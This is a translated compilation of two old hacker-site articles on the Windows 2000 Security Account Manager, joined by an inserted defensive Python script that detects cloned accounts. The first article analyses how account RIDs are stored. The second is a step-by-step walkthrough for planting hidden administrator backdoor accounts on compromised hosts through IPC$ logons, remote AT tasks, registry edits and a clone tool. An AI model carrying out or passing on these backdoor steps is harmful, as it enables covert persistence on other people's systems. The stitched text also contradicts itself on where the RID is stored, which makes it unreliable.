Anatomy of the Security Account Manager (SAM)
Source: www.opengram.com | Category: Hacker | Date: 2002-5-1 6:28:30
Author: refdom | Email: Refdom@263.net | Homepage: www.opengram.com | 2002/4/29
Contents
I. Summary
II. About SAM
III. The SAM database in the registry
IV. Structure and main content of the SAM database
V. Conclusions on the SAM database analysis
I. Summary

Analysing the structure of the Security Account Manager has occupied me for more than a month, but I only had scattered notes and had not released anything. The main reason is that the Security Account Manager (SAM) is the core of Windows account management, it is very systematic, and many points here are only inference and guesswork. At the same time, a mistaken SAM hack can make lsass.exe fail to load the Security Account Manager at boot; even safe mode cannot repair it (the SAM must be loaded there too), so the whole system fails to start (I usually have to boot a second system and delete the SAM file before the machine starts again). I am writing this up now mainly because of the rootkit method described by Adam and the "clone administrator account" technique that grew out of it. Being familiar with the SAM structure helps security staff carry out security tests (of course it can also be put to bad use). Only the contents of the SAM are covered here; the SECURITY database is not discussed.

II. About SAM

Do not misunderstand SAM: it is not simply the file named SAM. The SAM (Security Account Manager) is responsible for controlling and maintaining the SAM database. The SAM database is located in the registry under HKLM\SAM\SAM and is protected by an ACL; you can open it with the registry editor regedt32.exe and set the appropriate permissions to view its contents. On disk the SAM database is saved in the file SAM in the %systemroot%\system32\config\ directory; the same directory also holds the SECURITY file, which is the security database, and the two are closely related. The SAM database contains all groups and account information, including the password hashes and the SIDs of the accounts. These contents are described in detail later. The analysis uses the Chinese edition of Win2k Advanced Server.
III. The SAM database in the registry

Expanding the registry key HKLM\SAM\SAM\ gives:

HKLM
 \-- SAM
      \-- SAM
           |-- Domains
           |    |-- Account
           |    |    |-- Members
           |    |    |-- Groups
           |    |    |    |-- 00000201
           |    |    |    \-- Names
           |    |    \-- Users
           |    |         |-- 000001F4
           |    |         |-- 000003E8
           |    |         |-- 000003E9
           |    |         \-- Names
           |    |              |-- Guest
           |    |              \-- IUSR_REFDOM
           |    \-- Builtin
           |         |-- 0000022
           |         |-- 00000222
           |         |-- 00000223
           |         |-- Members
           |         |    \-- S-1-5-21-1214440339-70669826-1708537768
           |         |         |-- 000001F5
           |         |         |-- 000003E8
           |         |         \-- 000003E9
           |         |-- Names
           |         |    |-- Users
           |         |    \-- Power Users
           |         |-- Groups
           |         |    \-- Names
           |         \-- Users
           |              \-- Names
           \-- RXACT

This is the SAM tree in the registry on my machine. Compared with the SAM file, the registry tree is in fact the same as the file, except that the file starts with RXACT and only then continues with the Domains content (and so on down the tree): the order in the file is reversed.
If you prefer looking at the file itself: from offset 0000h to 006Ch it names the location of the SAM database, \systemroot\system32\config\sam, followed by blank space until 1000h (hbin), where the actual database content begins. The file format of the SAM database is not the main subject here; it is only touched on for those interested in researching it.

IV. Structure and main content of the SAM database

In the whole database, the main account content is at the following locations. Under \Domains\ is the SAM content of the domain (or machine), with two branches, "Account" and "Builtin". \Domains\Account holds the user accounts. \Domains\Account\Users holds the information about each account; its subkeys are named after the relative identifier (RID) of each account, for example 000001F4, and under each account there are two values, F and V. \Domains\Account\Users\Names holds the user account names; each account name key has only one default value, whose type is not an ordinary registry data type but the last component of the SID, the relative identifier. For example, Administrator has type 0x1F4, which corresponds to the account content under 000001F4 above. This shows the logic of Microsoft's account lookup.

Inference 1: Looking at accounts from the registry structure, when you query the information of an account named Refdom, Microsoft finds the type 0x3EB from the account name Refdom, then reads the content under the relative identifier (or SID) 000003EB. All API functions (such as NetUserEnum()) work this way. Therefore, if you change the type 0x3EB of the Refdom account to 0x1F4, the account is redirected to the content of 000001F4, and since 000001F4 is the Administrator account, the system turns Refdom completely into Administrator: everything the account Refdom uses, including password, permissions, desktop, records, access times and so on, becomes Administrator's.
This inference should hold, but it would mean that two usernames correspond to one set of user information, and the system ought to report an error at startup! Inference 1 is derived from the structure analysed above and reveals the relation between the account name and the SID during the logon process. \Domains\Account\Users\000001F4 is the account information of Administrator (the others are similar). It has two values, V and F. V holds the basic information of the account: username, full name, group, description, password hash, comment, whether the password can be changed, whether the account is enabled, the time the password was set, and so on. F holds some logon records, such as the last logon time and the number of failed logons, and one important item: the relative identifier of this account. I did not pay attention to this when I analysed the structure; this is Adam's idea. The point is that the RID appears twice for one account in the registry: once in the subkey name 000001F4 and once in the content of the value F, in the four bytes 48 to 51: F4 01 00 00, which is actually a long variable, 00 00 01 F4. Synchronisation issues arise when one identifier is stored in two places, and Microsoft evidently created this problem.
The two variables should jointly identify one user account, but Microsoft stores them separately without keeping them synchronised. The subkey name 000001F4 is used to map to the username Administrator so that account-related API functions such as LookupAccountSid() can find the account information conveniently, and this association should also be used during account logon. The F4 01 00 00 in the V value is most directly associated with the account logon.

Inference 2: When Windows logs a user on, the relative identifier is obtained from the SAM, and the location of this RID is the F4 01 00 00 in the V value; account information queries, however, use the content of the SAM subkey. Inferred reason (assumption 1): at logon, the logon process reads the RID value from the account record located by the username in the SAM database (that is, the F4 01 00 00 in V). After logon all values are tied to the account through this value; the API functions no longer use it, and the RID is instead taken from the field name of the data record (that is, the subkey 000001F4). Microsoft has committed a synchronisation logic error! Inference 2 comes from Adam; I had not inferred it before :( If inference 2 holds, it reveals how the account SID is obtained during logon, and it is why the logon records (logon time, password errors, etc.) follow the value in V. At the same time, because F holds a username and the API functions query this username, Adam's clone method is still easy to reveal; and once the clone is added, this username is also restored to the original username, so it is difficult to tell from the username alone.
As introduced above, V holds the basic information of the account: username, full name, group, description, password hash, comment, whether the password can be changed, whether the account is enabled, the time the password was set, and so on. Now, the password hash. Hypothesis 2: the account's V value contains the user's hashes, including the password encrypted in both LM and NT form, and a cracker can separate them; after all, LM is simple.

The content under Domains\Builtin relates to account groups. Its structure is similar to \Account, with the corresponding problems, so it is not repeated. In the SAM file on disk the content is not laid out as neatly as in the registry; it is located mainly by offset and length, and the information of a single account is kept together rather than split across two keys as in the registry (the name in one key, the information in another). In the SAM file the data can be located by these signatures: nk (6E 6B) key or subkey name; vk (76 6B) a value; lf (6C 66) subkey list; sk (73 6B) permissions.
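A consistency check a defender can run over the two places the article says a RID is stored (the type of the default value under Users\Names\<name>, and the little-endian DWORD at bytes 48 to 51 of the account's F value), as an added example that is not part of the original article. The account names, RIDs and F blobs below are constructed sample data; in practice they would come from a walk of HKLM\SAM\SAM\Domains\Account\Users after granting read access with regedt32.exe as the article describes, or from an offline copy of the hive.

```python
import struct
from collections import defaultdict

# Per the article: the RID is the little-endian DWORD at bytes 48..51 of F
# (F4 01 00 00 == 0x1F4 for Administrator).
F_RID_OFFSET = 48
ADMIN_RID = 0x1F4


def rid_from_f(f_value: bytes) -> int:
    """Return the RID embedded in an account's F value."""
    if len(f_value) < F_RID_OFFSET + 4:
        raise ValueError("F value too short to hold a RID at offset 48")
    return struct.unpack_from("<I", f_value, F_RID_OFFSET)[0]


def audit_sam(names: dict, users: dict) -> list:
    """Cross-check the two RID locations and report inconsistencies.

    names: account name -> RID taken from the type of the default value
           under Domains\\Account\\Users\\Names\\<name>
    users: RID of the Domains\\Account\\Users\\<RID> subkey -> its F bytes
    Returns sorted (account, finding) tuples; an empty list means consistent."""
    findings = []
    holders = defaultdict(list)
    for name, rid in names.items():
        holders[rid].append(name)
        if rid not in users:
            findings.append((name, f"Names entry points at missing Users\\{rid:08X}"))
            continue
        f_rid = rid_from_f(users[rid])
        if f_rid != rid:
            # The clone pattern: F copied from another account (e.g. 0x1F4).
            findings.append((name, f"F under Users\\{rid:08X} carries RID 0x{f_rid:X}"))
    for rid, owners in holders.items():
        if len(owners) > 1:
            # Inference 1 pattern: a Names type retargeted at another RID.
            findings.append((", ".join(sorted(owners)), f"share RID 0x{rid:X}"))
    return sorted(findings)


def make_f(rid: int) -> bytes:
    """Constructed 80-byte F value with only the RID field filled (sample data)."""
    f = bytearray(80)
    struct.pack_into("<I", f, F_RID_OFFSET, rid)
    return bytes(f)


# Constructed sample: one account with a copied F, one retargeted Names entry.
SAMPLE_NAMES = {
    "Administrator": 0x1F4,
    "Guest": 0x1F5,
    "refdom": 0x3EB,   # its F was overwritten with Administrator's F
    "hacker$": 0x1F4,  # its Names type was changed to point at Administrator
}
SAMPLE_USERS = {
    0x1F4: make_f(0x1F4),
    0x1F5: make_f(0x1F5),
    0x3EB: make_f(0x1F4),
}

if __name__ == "__main__":
    for account, finding in audit_sam(SAMPLE_NAMES, SAMPLE_USERS):
        print(f"{account}: {finding}")
```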
V. Conclusions on the SAM database analysis

SAM hacking is very dangerous. An incorrect modification destroys the system's security account manager data and causes startup problems, although startup can be recovered by deleting the SAM file. Once you are familiar with the SAM structure, you will find that you can swap username for username and user group for user group, and forge accounts and account groups, completely breaking Microsoft's account model, and very covertly, so that the account-related API functions cannot notice. Although Microsoft has made many logic mistakes in handling account information and the security account database is not safe, all of these operations require full administrator privileges. Hidden backdoors like this will be used by many "hackers", so administrators should also become familiar with the related techniques and do their own security testing; if they do, my purpose is achieved. A simple test tool for "clone administrator account" can be downloaded from my homepage (www.opengram.com), but what is needed more is for administrators to learn the related knowledge, so that intrusions can be detected better.

Establishing a hidden superuser
Source: Unknown | Category: Security Document | Date: 2003-2-8 11:22:08
A few days ago I saw on a website (sorry, I did not note which ^_*) an illustrated tutorial on building a hidden superuser, which gave me a lot of inspiration. The author only explained how to create the hidden superuser in the local graphical interface and said he could not do it from the command line, so I started exploring. At first I used REG.EXE (version 3.0) as the command-line tool to import the registry file, but after each import the hidden superuser could not be used; opening the registry showed that the default value type of the hidden superuser had not been imported. Because this data type is a hexadecimal number (for example, Administrator's default data type is 000001F4, and in the example below it is 00000409) rather than a string, DWORD or binary type, REG.EXE cannot identify it and so cannot import it, while the registry editor regedit.exe can import it from its graphical interface. Then it occurred to me that regedit.exe is a dual-mode program: it runs in the Windows interface and also under DOS. Since the graphical regedit.exe can import this data type, it should also be able to import it from the command line, and later tests proved this. Below is my method for creating a hidden superuser.

1. Creating a hidden superuser in the graphical interface

This applies to the local machine or a broiler (compromised host) with the 3389 terminal service open. The author I mentioned above did very well, but the method is rather complicated and needs PSU.exe (a program that runs a process as the system user), so you would have to upload PSU.exe to the broiler. My method does not need PSU.exe, because Windows 2000 has two registry editors: regedit.exe and regedt32.exe (in XP they are actually one program, and permissions are changed through "Permissions" in the right-click menu of a key).
Everyone is familiar with regedit.exe, but it cannot set permissions on the registry; the greatest advantage of regedt32.exe is that it can. NT/2000/XP account information is under the registry key HKEY_LOCAL_MACHINE\SAM\SAM, but other users have no right to view the information inside it, so I first use regedt32.exe to give myself "Full Control" on the SAM key. This makes the information under the SAM key readable and writable. The specific steps are as follows:

1. Suppose we are on a broiler with terminal services open, logged on as the superuser Administrator. First create an account from the command line or in the account manager: hacker$. Here I create it on the command line: net user hacker$ 1234 /add
2. Click Start / Run, enter regedt32.exe and press Enter.
3. Click "Permissions"; in the window that pops up, click Add and add the account you are logged on with in the Security pane. Here I logged on as Administrator, so I add Administrator and set its permission to "Full Control". Note: it is best to add your logged-on account or its group rather than modify the original accounts or groups, otherwise a series of unnecessary problems will follow. After the hidden superuser is built, come back here and delete the account you added.
4. Click Start → Run, enter regedit.exe and press Enter to start the registry editor regedit.exe.
Open the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\hacker$.
5. Export the items hacker$, 00000409 and 000001F4 as hacker.reg, 409.reg and 1F4.reg. Open these exported files in Notepad, copy the value of "F" under item 000001F4 (the superuser) and overwrite the value of "F" under item 00000409 (hacker$) with it, then merge 00000409.reg and hacker.reg.
6. On the command line run net user hacker$ /del to delete the user hacker$.
7. Press F5 in the regedit.exe window to refresh, then use File - Import Registry File to import the modified hacker.reg into the registry.
8. Restore the registry permissions to how they were (just remove the Administrator account you added).
9. Note: after the hidden superuser is built, hacker$ cannot be seen in the account manager, nor with the "net user" command. Once the superuser is established it cannot be changed: if you change the password of hacker$ with the net user command, this hidden superuser will be seen in the account manager and cannot be deleted.
2. Creating a hidden superuser remotely from the command line

This uses the AT command, because a scheduled task created by AT runs as SYSTEM, so the psu.exe program is not needed. To use AT, the Schedule service must be running on the broiler; if it is not, it can be started remotely with netsvc.exe from Fluxay (流光) or with sc.exe, and of course other methods can start the Schedule service too. For the command line you can use any of several connection methods, such as SQLEXEC to MSSQL's port 1433, or Telnet to get a cmdshell, as long as it has permission to run the AT command.

1. First find a broiler; how to do that is not discussed here. Assume we have found one whose superuser is Administrator with password 12345678, and now we start to create the hidden superuser remotely on the command line. (The host in the example is on my LAN; I changed its IP address to 13.50.97.238, which is not in use on the Internet, to avoid harassing a real address.)
2. First establish a connection with the broiler. The command is: net use \\13.50.97.238\ipc$ "12345678" /user:"Administrator"
3. Create a user on the broiler with the AT command (if the Schedule service is not started, start it remotely with netsvc.exe or sc.exe): at \\13.50.97.238 12:51 c:\winnt\system32\net.exe user hacker$ 1234 /add. Because the user name created this way contains a $, the net user command will not display this user, but the user can still be seen.
4. Export HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users with the AT command: at \\13.50.97.238 12:55 c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ (/e is a regedit.exe parameter; the key HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ must end with a backslash).
If necessary, use quotation marks: "c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\".
5. Download hacker.reg from the broiler to this machine and open it in Notepad to edit. The command is copy \\13.50.97.238\admin$ ... (what \\13.50.97.238\admin$ is has been introduced elsewhere and is not repeated here).
6. Then edit hacker.reg and copy it to the broiler as \\13.50.97.238\admin$\system32\hacker1.reg.
7. Check the broiler's time: net time \\13.50.97.238, then use the AT command to delete the user hacker$: at \\13.50.97.238 13:40 net user hacker$ /del
8. Verify that hacker$ has been deleted: disconnect from the broiler with net use \\13.50.97.238 /del, then connect with net use \\13.50.97.238\ipc$ "1234" /user:"hacker$"; the connection fails, which shows the account has been deleted.
9. Reconnect to the broiler: net use \\13.50.97.238\ipc$ "12345678" /user:"administrator", get the broiler's time, then use the AT command to import the copied hacker1.reg into the broiler's registry: at \\13.50.97.238 13:41 c:\winnt\regedit.exe /s ... (the /s parameter means silent mode).
10. Verify that hacker$ has been created; the method is the same as verifying above that hacker$ was deleted.
11. Then verify that the user hacker$ has read, write and delete permissions; if you are still not reassured, you can also verify that it can create other accounts.
12. From step 11 we can determine that hacker$ has superuser privileges, because the account I originally created with the AT command was an ordinary user, but now it has remote read, write and delete permissions.

3. What if the broiler does not have the 3389 terminal service open and I do not want to use the command line?

In this case you can also use the graphical interface to create a hidden superuser on the broiler, because regedit.exe and regedt32.exe can connect to a network registry: use regedt32.exe to set permissions on the remote host's registry key and regedit.exe to edit the remote registry. The account manager can also connect to another computer, so you can use it to create and delete accounts on the remote host. The specific steps are similar to the above, so I will not say more; only the speed is unbearable. But there are two prerequisites: 1. first use net use \\broiler IP\ipc$ "password" /user:"superuser name" to establish a connection with the remote host, so that regedit.exe, regedt32.exe and the account manager can connect to it; 2. the remote host must have the Remote Registry service running (if it is not, you can also start it remotely, because you have the superuser password).

4. Creating a hidden superuser from a disabled account

We can use a disabled user on the broiler to build a hidden superuser.
The method is as follows:
1. First see which users are disabled. In general, some administrators disable Guest for security, and of course other accounts may be disabled as well. In the graphical interface this is very easy, since a disabled account shows a red cross; on the command line I have not thought of a good way, and can only run "net user <username>" one at a time to see whether each user is disabled.
2. Assume here that the user hacker has been disabled by the administrator. First use Xiaorong's (小榕) clone program ca.exe to clone the disabled user hacker into a superuser (after cloning, the user hacker is activated automatically): ca.exe \\broiler IP Administrator <superuser password> hacker <hacker password>
3. If you now have a cmdshell, for example through the Telnet service or by using SQLEXEC to connect to the shell on MSSQL's default port 1433, just enter the command: net user hacker /active:no. The user hacker is then disabled (at least on the surface). Of course you can also replace the user hacker with another disabled user.